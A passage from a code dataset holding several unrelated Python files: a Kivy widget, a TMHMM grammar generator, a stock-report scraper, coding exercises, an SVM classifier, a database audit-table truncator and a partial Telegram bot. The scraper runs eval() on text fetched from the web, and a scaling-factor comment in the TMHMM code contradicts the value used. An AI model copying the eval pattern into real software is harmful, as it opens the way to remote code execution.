kwargs.get(\"halign\", \"left\")\n self.valign = kwargs.get(\"valign\", \"top\")\n\n self.bind(on_text=self.on_text)\n\n super().__init__(**kwargs)\n\n def on_text(self, instance, value):\n self.redraw()\n\n def on_size(self, instance, value):\n self.redraw()\n\n def redraw(self):\n \"\"\"\n Note: This methods depends on internal variables of its TextInput\n base class (_lines_rects and _refresh_text())\n \"\"\"\n self._refresh_text(self.text)\n\n total_size = [x.size for x in self._lines_rects] # Modified to handle runtime dynamic on_text\n max_size = functools.reduce(lambda x, y: (x[0]+y[0], x[1]), total_size)\n num_lines = 1 #len(self._lines_rects)\n\n px = [DEFAULT_PADDING, DEFAULT_PADDING]\n py = [DEFAULT_PADDING, DEFAULT_PADDING]\n\n if self.halign == 'center':\n d = (self.width - max_size[0]) / 2.0 - DEFAULT_PADDING\n px = [d, d]\n elif self.halign == 'right':\n px[0] = self.width - max_size[0] - DEFAULT_PADDING\n\n if self.valign == 'middle':\n d = (self.height - max_size[1] * num_lines) / 2.0 - DEFAULT_PADDING\n py = [d, d]\n elif self.valign == 'bottom':\n py[0] = self.height - max_size[1] * num_lines - DEFAULT_PADDING\n\n self.padding_x = px\n self.padding_y = py\n","repo_name":"MaddoxRauch/MathCat","sub_path":"alignedtextinput.py","file_name":"alignedtextinput.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"17163118743","text":"import sys\n\nMAP_LABEL_COLOR = {\n 'i': '#b3e2cd',\n 'O': '#fdcdac',\n 'o': '#cbd5e8',\n 'M': '#f4cae4'}\n\n\ndef parse_model(fp: str):\n \"\"\"Parse original TMHMM model file (currently only 2.0).\n Parameters\n ----------\n fp : str\n Filepath to original TMHMM model file.\n Download at https://services.healthtech.dtu.dk/cgi-bin/sw_request\n\n Returns\n -------\n Dict of HMM states.\n \"\"\"\n states = dict()\n with open(fp, 'r') as f:\n content = ''.join([line.strip()+' '\n for line in f.readlines()\n if (not line.startswith('#'))])\n for content_state in content.split('}'):\n keyvalues = dict()\n\n content_state = content_state.strip()\n if content_state == \"\":\n continue\n statename, statecontent = content_state.split('{')\n statename = statename.strip()\n\n for field in statecontent.split(';'):\n field = field.strip()\n if field == \"\":\n continue\n key = field.split()[0]\n keyvalues[key] = field.split()[1:]\n states[statename] = keyvalues\n\n # carry over tied transitions\n for name in states:\n if 'tied_trans' in states[name].keys():\n tiedtrans = []\n for i in range(len(states[name]['trans'])):\n tiedtrans.append(states[name]['trans'][i] + ':')\n tiedtrans.append(\n states[states[name]['tied_trans'][0]]['trans'][2*i+1])\n states[name]['trans'] = tiedtrans\n del states[name]['tied_trans']\n\n # allow begin -> end transition to parse \"\" string\n del states['begin']['end']\n\n return states\n\n\ndef model_to_graphviz(states: dict) -> str:\n \"\"\"Generates graphviz code to plot the (TM)HMM.\n\n Parameters\n ----------\n states:\n States of the HMM as obtained from \"parse_model\".\n\n Returns\n -------\n String that containes graphviz code.\n \"\"\"\n # dot graph\n out = \"digraph tmhmm {\\n\"\n for name in states.keys():\n state = states[name]\n\n if (name == 'header'):\n continue\n\n label = name\n attr = \"\"\n if 'label' in state.keys():\n label += '
%s' % state['label'][0]\n attr = 'fillcolor=\"%s\", style=filled' % MAP_LABEL_COLOR[\n state['label'][0]]\n if 'only' in state.keys():\n attr += ', shape=\"folder\"'\n out += \"state_%s [ label=<%s> %s ];\\n\" % (name, label, attr)\n if 'trans' in state.keys():\n if ':' in ''.join(state['trans']):\n for k in range(0, len(state['trans']), 2):\n prob = float(state['trans'][k+1])\n threshold = 0\n out += \"state_%s -> state_%s [ penwidth=%.2f %s ];\\n\" % (\n name,\n state['trans'][k].split(':')[0].strip(),\n max(1, 10 * prob),\n '' if prob > threshold else ', style=\"dotted\"'\n )\n else:\n for to in state['trans']:\n out += \"state_%s -> state_%s;\\n\" % (name, to)\n assert 'tied_trans' not in state.keys()\n out += \"}\\n\"\n\n return out\n\n\ndef model_to_grammar(states: dict) -> str:\n \"\"\"Translates model into ADP grammar.\n\n Parameters\n ----------\n states:\n States of the HMM as obtained from \"parse_model\".\n\n Returns\n -------\n String containing source code for grammar component of ADP source code.\n \"\"\"\n gra = \"grammar gra_tmhmm uses sig_tmhmm(axiom = state_begin) {\\n\"\n map_state_label = dict()\n for name, state in states.items():\n # skip the header \"state\", which defined the alphabet\n if (name == 'header'):\n continue\n\n # normalize label\n # - use first char\n # - use ' ' if no label is given\n label = \" \"\n if 'label' in state.keys():\n assert len(state['label']) == 1\n label = state['label'][0]\n map_state_label['state_%s' % name] = label\n\n # normalize transitions\n # - from 'a:', 'b', 'c:', 'd' build dict {'a': 'b', 'c': 'd'}\n # - add 'nil': '0' if ending parse in this state is allowed\n # - use float format instead of int, i.e. 0.0 instead of 0\n norm_transitions = None\n if ':' in ''.join(state['trans']):\n norm_transitions = {state['trans'][k].split(':')[0]:\n {'1': '1.0',\n '0': '0.0'}.get(\n state['trans'][k+1],\n state['trans'][k+1]) for k in range(0, len(state['trans']), 2)}\n if 'end' not in state.keys():\n norm_transitions.update({'end': '1.0'})\n else:\n assert state['end'] == ['0']\n else:\n assert False\n\n\n # transform emission information into GAP rules\n nt_emissions = \"emit_\"\n emissions = None\n assert len(\n set(['only', 'tied_letter', 'letter']) & set(state.keys())) == 1\n if 'only' in state.keys():\n nt_emissions += name\n es = {x.split(':')[0]: x.split(':')[-1] for x in state['only']}\n assert abs(sum(map(float, es.values())) - 1) < 0.001\n emissions = []\n for k, v in es.items():\n if float(v) <= 0:\n print(\"Emission probability of state '%s' for AA '%s' is zero! Emission will be omitted in grammar.\" % (name, k), file=sys.stderr)\n emissions.append(\" emission(CONST_FLOAT(%s), CHAR('%s'))\" % (v, k))\n elif 'tied_letter' in state.keys():\n assert len(state['tied_letter']) == 1\n nt_emissions += state['tied_letter'][0]\n elif 'letter' in state.keys():\n assert state['letter'] == ['NULL']\n nt_emissions = None\n emissions = None\n\n # transform transition information into GAP production rules\n code_transitions = []\n for to_state, prob in norm_transitions.items():\n if (emissions is None) and (nt_emissions is None):\n if to_state == \"end\":\n code_transitions.append(' state_end')\n else:\n code_transitions.append(' silent_transition(CONST_FLOAT(%s), state_%s)' % (prob, to_state))\n else:\n if float(prob) <= 0:\n print(\"Transition probability from state '%s' to state '%s' is zero! Transition will be omitted in grammar.\" % (name, to_state), file=sys.stderr)\n else:\n code_transitions.append(' transition(CONST_CHAR(\\'%s\\'), CONST_FLOAT(%s), %s, state_%s)' % (label, prob, nt_emissions, to_state))\n\n\n gra += ' state_%s =\\n%s\\n # h;\\n' % (name, ' |\\n'.join(code_transitions))\n if emissions is not None:\n gra += ' emit_%s =\\n%s\\n # h;\\n' % (name, ' |\\n'.join(emissions))\n\n gra += \"\\n\"\n\n gra += ' state_end = nil(EMPTY) # h;\\n'\n gra += \"}\\n\"\n\n return gra, map_state_label\n\n\ndef generic_sig_algs() -> str:\n sig = \"signature sig_tmhmm(alphabet, answer) {\\n\"\n sig += \" answer silent_transition(float, answer);\\n\"\n sig += \" answer transition(char, float, answer, answer);\\n\"\n sig += \" answer nil(void);\\n\"\n sig += \" answer emission(float, alphabet);\\n\"\n sig += \" choice [answer] h([answer]);\\n\"\n sig += \"}\\n\"\n\n alg_viterbi = (\n \"algebra alg_viterbi implements sig_tmhmm(alphabet=char, \"\n \"answer=float) {\\n\"\n \" float silent_transition(float prob, float t) {\\n\"\n \" return prob * t;\\n\"\n \" }\\n\"\n \" float transition(char label, float prob, float e, float t) {\\n\"\n \" return prob * e * t;\\n\"\n \" }\\n\"\n \" float nil(void) {\\n\"\n \" return 1.0;\\n\"\n \" }\\n\"\n \" float emission(float prob, char emission) {\\n\"\n \" return prob;\\n\"\n \" }\\n\"\n \" choice [float] h([float] candidates) {\\n\"\n \" return list(maximum(candidates));\\n\"\n \" }\\n\"\n \"}\\n\")\n\n alg_fwd = (\n \"algebra alg_fwd extends alg_viterbi {\\n\"\n \" choice [float] h([float] candidates) {\\n\"\n \" return list(sum(candidates));\\n\"\n \" }\\n\"\n \"}\\n\")\n\n alg_fwd_scaled = (\n \"algebra alg_fwd_scaled extends alg_viterbi {\\n\"\n \" float emission(float prob, char emission) {\\n\"\n \" /* 43.38 is a scaling factor against numeric instability,\\n\"\n \" * as candidate probabilities tend to become very small.\\n\"\n \" * The value is 1 / median of all emission probabilities\\n\"\n \" * in the TMHMM2 model; but in principle can be any value > 1.\\n\"\n \" */\\n\"\n \" return 22.56 * prob;\\n\"\n \" }\\n\"\n \" float normalize_derivative(float q, float pfunc) {\\n\"\n \" return q / pfunc;\\n\"\n \" }\\n\"\n \" choice [float] h([float] candidates) {\\n\"\n \" return list(sum(candidates));\\n\"\n \" }\\n\"\n \"}\\n\")\n\n alg_viterbi_bit = (\n \"algebra alg_viterbi_bit extends alg_viterbi {\\n\"\n \" float silent_transition(float prob, float t) {\\n\"\n \" return log(1.0/prob) + t;\\n\"\n \" }\\n\"\n \" float transition(char label, float prob, float e, float t) {\\n\"\n \" return log(1.0/prob) + e + t;\\n\"\n \" }\\n\"\n \" float nil(void) {\\n\"\n \" return 0.0;\\n\"\n \" }\\n\"\n \" float emission(float prob, char emission) {\\n\"\n \" return log(1.0/prob);\\n\"\n \" }\\n\"\n \" choice [float] h([float] candidates) {\\n\"\n \" return list(minimum(candidates));\\n\"\n \" }\\n\"\n \"}\\n\"\n )\n\n alg_fwd_bit = (\n \"algebra alg_fwd_bit extends alg_viterbi_bit {\\n\"\n \" float normalize_derivative(float q, float pfunc) {\\n\"\n \" return exp(pfunc - q);\\n\"\n \" }\\n\"\n \" choice [float] h([float] candidates) {\\n\"\n \" return list(negexpsum(candidates));\\n\"\n \" }\\n\"\n \"}\\n\"\n )\n\n alg_label = (\n \"algebra alg_label implements sig_tmhmm(alphabet=char,\"\n \" answer=Rope) {\\n\"\n \" Rope silent_transition(float prob, Rope x) {\\n\"\n \" return x;\\n\"\n \" }\\n\"\n \" Rope transition(char label, float prob, Rope e, Rope t) {\\n\"\n \" Rope res;\\n\"\n \" append(res, label);\\n\"\n \" append(res, t);\\n\"\n \" return res;\\n\"\n \" }\\n\"\n \" Rope nil(void) {\\n\"\n \" Rope res;\\n\"\n \" return res;\\n\"\n \" }\\n\"\n \" Rope emission(float prob, char emission) {\\n\"\n \" Rope res;\\n\"\n \" return res;\\n\"\n \" }\\n\"\n \" choice [Rope] h([Rope] candidates) {\\n\"\n \" return unique(candidates);\\n\"\n \" }\\n\"\n \"}\\n\"\n )\n\n return [sig, alg_viterbi, alg_fwd, alg_fwd_scaled, alg_viterbi_bit,\n alg_fwd_bit, alg_label]\n\n\ndef generate_gapc(fp_model: str, fp_output: str):\n model = parse_model(fp_model)\n\n grammar = model_to_grammar(model)[0]\n comps = generic_sig_algs()\n sig = comps.pop(0)\n algs = comps\n\n with open(fp_output, 'w') as f:\n f.write(\"import \\\"ext_hmm.hh\\\"\\n\")\n f.write(\"type Rope = extern\\n\\n\")\n f.write(sig+\"\\n\")\n f.write('algebra alg_enum auto enum;\\n\\n')\n f.write('algebra alg_count auto count;\\n\\n')\n for alg in algs:\n f.write(alg+\"\\n\")\n f.write(grammar+\"\\n\")\n f.write('instance dummy = gra_tmhmm(alg_enum);\\n')\n","repo_name":"jlab/ADP_collection","sub_path":"tmhmm.py","file_name":"tmhmm.py","file_ext":"py","file_size_in_byte":11607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17536364376","text":"# -*- coding=utf-8 -*-\n\n# 中泰证券研报\n# url0 = \"http://datainterface.eastmoney.com//EM_DataCenter/js.aspx?type=SR&sty=SRCC&stat=0&js=var%20zzsrYpDY={%22data%22:[(x)],%22pages%22:%22(pc)%22,%22update%22:%22(ud)%22,%22count%22:%22(count)%22}&ps=25\"\n# url1 = \"&p={}&code=80000157&rt=51774703\"\n# 个股研报\nurl0 = \"http://datainterface.eastmoney.com//EM_DataCenter/js.aspx?type=SR&sty=GGSR&js=var%20sHbElhIt={%22data%22:[(x)],%22pages%22:%22(pc)%22,%22update%22:%22(ud)%22,%22count%22:%22(count)%22}&ps=50\"\nurl1 = \"&p={}&mkt=0&stat=0&cmd=2&code=&rt=51774793\"\n\nimport requests\nimport collections\nimport pandas as pd\nimport xlrd\nimport numpy as np\nfrom datetime import datetime,timedelta\nimport time\nfrom connmongo import MongoConn\n\nclass getreports():\n def __init__(self,page):\n self.page = page\n\n def parsepage(self):\n for i in range(1, self.page):\n murl = url1.format(i)\n jsondata = requests.get(url0 + murl)\n print(jsondata.text)\n yield eval(jsondata.text.split('=')[1])\n\n\nif __name__ == '__main__':\n test = getreports(page=10)\n my_conn = MongoConn()\n finalrst = []\n keys = set()\n for dt in test.parsepage():\n rst = []\n for d in dt['data']:\n dt = d['datetime']\n dtt = datetime.strptime(dt,'%Y-%m-%dT%H:%M:%S') \n deathday = datetime.now()-timedelta(days=3)\n if deathday <= dtt:\n rst.append({d['secuName']:d['rate']})\n keys.add(d['secuName'])\n finalrst.extend(rst)\n final2 = dict.fromkeys(keys)\n for item in finalrst:\n mkey = list(item.keys())[0]\n mval = list(item.values())[0]\n if not final2.get(mkey):\n final2[mkey] = [mval]\n else:\n final2[mkey].append(mval)\n print(final2)\n final3 = dict.fromkeys(keys)\n for jk, jval in final2.items():\n final3[jk] = collections.Counter(jval)\n print(final3)\n final4 = pd.DataFrame.from_dict(final3)\n final5 = final4.transpose()\n final6 = final5.sort_index(by=[\"买入\",\"增持\"],ascending=[False,False])\n print(final6)\n filename = time.strftime('%Y-%m-%d',time.localtime())\n final6.to_csv(filename + \".csv\",encoding='utf_8_sig')\n\n\n\n\n\n","repo_name":"xiakexing716/eastmoney","sub_path":"yanbao.py","file_name":"yanbao.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"6606905136","text":"from heapq import heappop, heappush\nfrom typing import List, Set, Tuple\n\n\nmaxheap: List[Tuple[int, int]] = []\nminheap: List[Tuple[int, int]] = []\nremoved: Set[int] = set()\n\n\ndef insert(data: int, idx: int) -> None:\n heappush(maxheap, (-data, idx))\n heappush(minheap, (data, idx))\n\n\ndef delete(heap: List[Tuple[int, int]]) -> None:\n while heap:\n _, idx = heappop(heap)\n if idx not in removed:\n removed.add(idx)\n break\n\n\ndef get(heap: List[Tuple[int, int]]) -> int:\n while heap:\n data, idx = heappop(heap)\n if idx not in removed:\n return data\n return 0\n\n\ndef solution(operations: List[str]) -> List[int]:\n for idx, op in enumerate(operations):\n cmd, data = op.split()\n\n if cmd == \"I\":\n insert(int(data), idx)\n elif data == \"1\":\n delete(maxheap)\n else:\n delete(minheap)\n\n return [-get(maxheap), get(minheap)]\n","repo_name":"JeongGod/Algo-study","sub_path":"seonghoon/week02(22.01.04~22.01.10)/p42628.py","file_name":"p42628.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"} +{"seq_id":"32100403604","text":"import numpy as np\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.metrics import accuracy_score\r\n\r\ndata = np.genfromtxt(\"data/mnist_train.csv\", delimiter=\",\", skip_header=1)\r\ny, x = data[:, 0], data[:, 1:]\r\n\r\ntrain_size = 10000\r\ntest_size = 1000\r\n\r\nx_train, x_val = x[:train_size], x[train_size:train_size+test_size]\r\ny_train, y_val = y[:train_size], y[train_size:train_size+test_size]\r\n\r\nparam_grid = {\"C_values\": [1, 5, 10], \"gamma_values\": [1e-06, 1e-05, 1e-03]}\r\n# I searched for the best parameters of these ones, and found C=5 and gamma = 1e-06.\r\n# I found this out using GridSearch with the paramgrid shown.\r\n# I have removed this code since we now know the best hyperparameters.\r\n\r\nkernel_type = \"rbf\"\r\ngamma_type = \"scale\"\r\nC_value = 5\r\n\r\nsvm_classifier = SVC(kernel=kernel_type, gamma=gamma_type, C=C_value)\r\nsvm_classifier.fit(x_train, y_train)\r\n\r\npredicted_labels = svm_classifier.predict(x_val)\r\naccuracy_percentage = accuracy_score(y_val, predicted_labels) * 100\r\nprint(\"OVO Accuracy: {:.2f}%\".format(accuracy_percentage))\r\n\r\n\r\ndef OVA(X, y, C):\r\n classes = np.unique(y)\r\n models = {class_label: SVC(kernel=kernel_type, C=C, gamma=gamma_type, probability=True).fit(X, np.where(y == class_label, 1, 0)) for class_label in classes}\r\n return models\r\n\r\n\r\nova_models = OVA(x_train, y_train, C=5)\r\nnum_classes = len(ova_models)\r\nnum_samples = len(x_val)\r\nprobabilities = np.zeros((num_samples, num_classes))\r\n\r\nfor class_index, class_label in enumerate(ova_models):\r\n model = ova_models[class_label]\r\n binary_labels = np.where(y_val == class_label, 1, 0)\r\n probabilities[:, class_index] = model.predict_proba(x_val)[:, 1]\r\n\r\npredicted_labels = np.argmax(probabilities, axis=1)\r\naccuracy = np.mean(predicted_labels == y_val) * 100\r\n\r\nprint(\"OVA Accuracy: {:.2f}%\".format(accuracy))","repo_name":"Knoz9/ML-A3-A4","sub_path":"km222ug_A3/E3.py","file_name":"E3.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"43627578214","text":"from typing import List\n\n\nclass Solution:\n # O(N)\n def sumOddLengthSubarrays(self, arr: List[int]) -> int:\n res = 0\n n = len(arr)\n for i in range(n):\n res += ((i + 1) * (n - i) + 1) // 2 * arr[i]\n return res\n\n\n # O(N^2)\n # Passing LC\n def sumOddLengthSubarrays_own(self, arr: List[int]) -> int:\n res = 0\n n = len(arr)\n preSums = [0]\n for num in arr:\n preSums.append(preSums[-1] + num)\n for i in range(n):\n for j in range(i, n, 2):\n res += preSums[j+1] - preSums[i]\n return res\n\n\n def test(self):\n test_cases = [\n [1,4,2,5,3],\n [1],\n [1,2],\n [10,11,12],\n ]\n for arr in test_cases:\n res = self.sumOddLengthSubarrays(arr)\n print('res: %s' % res)\n print('-='*30 + '-')\n\n\nif __name__ == '__main__':\n Solution().test()\n","repo_name":"MichaelTQ/LeetcodePythonProject","sub_path":"solutions/leetcode_1551_1600/LeetCode1588_SumAllOddLengthSubarrays.py","file_name":"LeetCode1588_SumAllOddLengthSubarrays.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"15932126431","text":"from sqlalchemy import create_engine,\\\n MetaData,\\\n Table\nfrom sqlalchemy.engine import reflection\nfrom sqlalchemy.orm import sessionmaker\nimport logging\nfrom mysql.connector.connection import MySQLConnection\nfrom .. import config\nimport os\nimport datetime\nfrom multiprocessing import Process\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom decimal import Decimal\nfrom sqlalchemy import and_\n\nBase = declarative_base()\n\n\nengine_name = config.get('mysqld', 'url')\n\ndef connect_mysql():\n \"\"\"\n return an inspector object\n \"\"\"\n MySQLConnection.get_characterset_info = MySQLConnection.get_charset\n\n db = create_engine(engine_name)\n db.echo = True\n db.connect()\n \n return db\n\nsqlite_engine = \"sqlite:///%s\"%(config.get('sqlite', 'backup_url'))\n\ndef connect_sqlite():\n\n db = create_engine(sqlite_engine, echo=True)\n db.connect()\n return db\n\ndef truncate_all_audit_tables():\n logging.info(\"Starting truncation\")\n\n mysql_db = connect_mysql()\n sqlite_db = connect_sqlite()\n\n # create a configured \"Session\" class\n session1 = sessionmaker(bind=mysql_db)\n session2 = sessionmaker(bind=sqlite_db)\n\n # create a Session\n mysql_session = session1()\n sqlite_session = session2() \n\n mysql_metadata = MetaData(mysql_db)\n sqlite_metadata = MetaData(sqlite_db)\n\n insp = reflection.Inspector.from_engine(mysql_db)\n\n tables = {}\n audit_tables = {}\n for table_name in insp.get_table_names():\n table = Table(table_name, mysql_metadata, autoload=True)\n if table_name.endswith('_aud'):\n audit_tables[table_name] = table\n else:\n tables[table_name] = table\n\n for t in tables:\n table = tables[t]\n audit_table = audit_tables.get(\"%s_aud\"%(t))\n if audit_table is None:\n logging.warning(\"Audit table for %s does not exist\"%(table.name))\n continue\n export_table_to_sqlite(mysql_session, sqlite_session, sqlite_metadata, audit_table)\n truncate_table(mysql_session, table, audit_table)\n \n mysql_session.commit()\n sqlite_session.commit()\n logging.info(\"Truncation Complete\")\n\ndef truncate_table(session, table, audit_table):\n \"\"\"\n @args: session so queries can be made, table so primary key columns\n can be determined and the audit_table to be truncated.\n \"\"\"\n pk_col_names = [x.name for x in table.primary_key.columns]\n\n truncated_cols = []\n for audit_col in audit_table.columns:\n if audit_col.name in pk_col_names:\n truncated_cols.append(audit_col)\n\n rs = session.query(*truncated_cols).group_by(*truncated_cols).all()\n\n for r in rs:\n args = []\n for arg in truncated_cols:\n args.append(arg == getattr(r, arg.name))\n \n aud_id_col = audit_table.c['aud_id']\n rs = session.query(aud_id_col).filter(and_(*args)).order_by(aud_id_col.desc())[3:]\n aud_ids = [str(r.aud_id) for r in rs]\n if len(aud_ids) > 0:\n delete_sql = \"delete from %(table_name)s where aud_id in %(aud_ids)s;\"\\\n %{'table_name':audit_table.name,\n 'aud_ids' : \"(%s)\"%(','.join(aud_ids),)}\n session.execute(delete_sql)\n\ndef export_table_to_csv(session, table, target=None):\n \"\"\"\n @args: session so queries can be made, table so primary key columns\n can be determined and the audit_table to be truncated.\n \"\"\"\n\n if target is None:\n target_dir = os.path.join(config.get('db', 'export_target'))\n target = os.path.join(config.get('db', 'export_target'), table.name)\n\n if not os.path.exists(target_dir):\n os.mkdir(target_dir)\n\n if os.path.exists(target):\n target_file = open(target, 'r+')\n \n rs = session.query(table).all()\n \n entries_in_db = set()\n for r in rs:\n entries_in_db.add(\"%s\"%(r.__repr__()))\n\n contents = set(target_file.read().split('\\n'))\n \n new_data = entries_in_db.difference(contents)\n\n if len(new_data) > 0:\n target_file.write(\"%s\\n\"%(datetime.datetime.now()))\n target_file.write(\"%s\\n\"%('.'.join([c.name for c in table.columns])))\n for d in new_data:\n target_file.write(\"%s\\n\"%(d))\n else:\n target_file = open(target, 'w')\n rs = session.query(table).all()\n target_file.write(\"%s\\n\"%(datetime.datetime.now()))\n target_file.write(\"%s\\n\"%('.'.join([c.name for c in table.columns])))\n for r in rs:\n target_file.write(\"%s\\n\"%(r.__repr__()))\n\ndef export_table_to_sqlite(mysql_session, sqlite_session, sqlite_metadata, audit_table):\n \"\"\"\n @args: session so queries can be made, table so primary key columns\n can be determined and the audit_table to be truncated.\n \"\"\"\n\n\n current_data = mysql_session.query(audit_table).all()\n\n sqlite_table = Table(audit_table.name, sqlite_metadata, autoload=True)\n\n sqlite_data = sqlite_session.query(sqlite_table).all()\n\n entries_in_mysql_db = set(current_data)\n entries_in_sqlite_db = set(sqlite_data)\n \n new_data = list(entries_in_mysql_db.difference(entries_in_sqlite_db))\n if len(new_data) > 0:\n values = [] \n for val in new_data:\n row = []\n for i, v in enumerate(val):\n if type(v) == Decimal:\n row.append(float(v))\n else:\n row.append(v)\n values.append(tuple(row))\n\n markers = ','.join('?' * len(new_data[0]))\n colnames = '(%s)'%(','.join(new_data[0].keys()))\n ins = 'INSERT INTO {tablename} {colnames} VALUES ({markers})'\n ins = ins.format(tablename=sqlite_table.name, colnames=colnames, markers=markers)\n res = sqlite_session.connection().execute(ins, values)\n\n logging.info(res)\n\ndef run():\n p = Process(target=truncate_all_audit_tables)\n p.start()\n #p.join()\n\nif __name__ == '__main__':\n logging.basicConfig(level='INFO')\n truncate_all_audit_tables()\n\n","repo_name":"hydraplatform/hydra-base","sub_path":"hydra_base/db/truncate.py","file_name":"truncate.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"6"} +{"seq_id":"2193066987","text":"import telegram\nimport pickle\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\nfrom telegram import InlineKeyboardMarkup, InlineKeyboardButton\nimport pandas as pd\nimport sklearn\n\ntext = \"\"\nvia = \"\"\nsobborgo = \"\"\nnumcam = 0\nnumbagn = 0\nnumgarage = 0\nlandarea = 0\nfloor = 0\nbuild = 0\ndistcentro = 0\nneastn = \"\"\nneastndist = 0\ndatesold = 0\npostcode = 0\nlatitude = 0\nlongitude = 0\nnearestsch = \"\"\nnearestschdist = 0\nnearestschgrade = 0\nuser_location = 0\ndati_inviati = 0\n# funzione che gestisce il comando /start\ndef start(update, context):\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Ciao! Sono un bot che predice il costo di una casa nella città di Perth. Quando verrà chiesto di inserire un dati in numero bisogna inserire un numero intero. Inserisci la tua via e il sobborgo separati da una virgola.\")\n context.user_data['dati_inviati'] = 0\n\n# funzione che gestisce i messaggi di testo\ndef text_message(update, context):\n if context.user_data['dati_inviati'] == 0:\n text = update.message.text\n via, sobborgo = text.split(',')\n context.user_data['via'] = via.strip()\n context.user_data['sobborgo'] = sobborgo.strip()\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Inserisci il numero di camere che ha la tua casa\")\n context.user_data['dati_inviati'] += 1\n elif context.user_data['dati_inviati'] == 1:\n numcam = int(update.message.text)\n context.user_data['camere'] = numcam\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Inserisci il numero di bagni che ha la tua casa?\")\n context.user_data['dati_inviati'] += 1\n elif context.user_data['dati_inviati'] == 2:\n numbagn = int(update.message.text)\n context.user_data['bagni'] = numbagn\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Inserisci il numero di garage che ha la tua casa?\")\n context.user_data['dati_inviati'] += 1\n elif context.user_data['dati_inviati'] == 3:\n numgarage = update.message.text\n if numgarage.isdigit():\n context.user_data['garage'] = int(numgarage)\n context.bot.send_message(chat_id=update.effective_chat.id,\n text=\"Inserisci i mq catastali e quelli calpestabili dell'abitazione separati dalla virgola\")\n context.user_data['dati_inviati'] += 1\n else:\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Inserisci un numero intero.\")\n elif context.user_data['dati_inviati'] == 4:\n land = update.message.text\n if ',' in land:\n landarea, floor = land.split(',')\n context.user_data['land_area'] = landarea.strip()\n context.user_data['floor_area'] = floor.strip()\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Inserire anno di costruzione\")\n context.user_data['dati_inviati'] += 1\n else:\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Inserisci la virgola.\")\n elif context.user_data['dati_inviati'] == 5:\n build = update.message.text\n if build.isdigit():\n context.user_data['anno'] = int(build)\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Inserisci la distanza dal centro\")\n context.user_data['dati_inviati'] += 1\n else:\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Devi inserire un numero intero.\")\n elif context.user_data['dati_inviati'] == 6:\n distcentro = update.message.text\n if distcentro.isdigit():\n context.user_data['distanza'] = int(distcentro)\n context.bot.send_message(chat_id=update.effective_chat.id,\n text=\"Inserisci il nome e la distanza della stazione più vicina separati dalla virgola\")\n context.user_data['dati_inviati'] += 1\n else:\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Devi inserire un numero intero.\")\n elif context.user_data['dati_inviati'] == 7:\n statio = update.message.text\n if ',' in statio:\n neastn, neastndist = statio.split(',')\n context.user_data['nomestazione'] = neastn.strip()\n context.user_data['distanzastazione'] = neastndist.strip()\n context.bot.send_message(chat_id=update.effective_chat.id,\n text=\"Inserisci anno dell'ultima vendita della casa\")\n context.user_data['dati_inviati'] += 1\n else:\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Non hai inserito la virgola.\")\n elif context.user_data['dati_inviati'] == 8:\n datesold = update.message.text\n if datesold.isdigit():\n context.user_data['datavendita'] = int(datesold)\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Inserire il codice postale\")\n context.user_data['dati_inviati'] += 1\n else:\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Devi inserire un numero intero.\")\n elif context.user_data['dati_inviati'] == 9:\n postcode = update.message.text\n if postcode.isdigit():\n context.user_data['codicepostale'] = int(postcode)\n #keyboard = [[InlineKeyboardButton(\"Invia posizione\", request_location=True)]]\n #reply_markup = InlineKeyboardMarkup(keyboard)\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Inserisci la tua latitudine.\")\n context.user_data['dati_inviati'] += 1\n else:\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Devi inserire un numero intero.\")\n elif context.user_data['dati_inviati'] == 10:\n user_location = update.message.text\n context.user_data['latitude'] = int(user_location)\n context.bot.send_message(chat_id=update.effective_chat.id,\n text=\"Inserisci la tua longitudine\")\n context.user_data['dati_inviati'] += 1\n elif context.user_data['dati_inviati'] == 11:\n longitude = update.message.text\n context.user_data['longitude'] = int(longitude)\n context.bot.send_message(chat_id=update.effective_chat.id,\n text=\"Inserisci il nome e la distanza della scuola più vicina separati dalla virgola\")\n context.user_data['dati_inviati'] += 1\n elif context.user_data['dati_inviati'] == 12:\n scuolaa = update.message.text\n if ',' in scuolaa:\n nearestsch, nearestschdist = scuolaa.split(',')\n context.user_data['nomescuola'] = nearestsch.strip()\n context.user_data['distanzascuola'] = nearestschdist.strip()\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Inserisci il grado della scuola\")\n context.user_data['dati_inviati'] += 1\n else:\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Non hai inserito la virgola.\")\n elif context.user_data['dati_inviati'] == 13:\n nearestschgrade = update.message.text\n if nearestschgrade.isdigit():\n context.user_data['grado'] = int(nearestschgrade)\n dictionary = {'ADDRESS' : context.user_data['via'],\n 'SUBURB' : context.user_data['sobborgo'],\n 'BEDROOMS' : context.user_data['camere'],\n 'BATHROOMS' : context.user_data['bagni'],\n 